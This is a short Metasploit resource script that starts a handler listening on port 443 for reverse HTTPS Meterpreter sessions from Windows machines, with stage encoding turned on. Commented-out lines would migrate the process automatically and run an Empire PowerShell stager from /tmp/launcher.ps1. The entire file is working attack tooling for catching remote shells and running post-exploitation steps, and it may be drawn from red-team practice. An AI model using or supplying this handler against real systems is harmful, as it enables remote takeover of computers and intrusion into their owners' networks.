# Initiates a handler for a reverse HTTPS meterpreter stager, using stage encoding
# The autorunscript is set to autorun.rc

use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set EnableStageEncoding true 

# Automatically migrate and then run Empire stager
#set AutoRunScript post/windows/manage/priv_migrate
#set InitialAutoRunScript post/windows/manage/powershell/exec_psh SCRIPT=/tmp/launcher.ps1 TIMEOUT=-1

# Execute
exploit -j
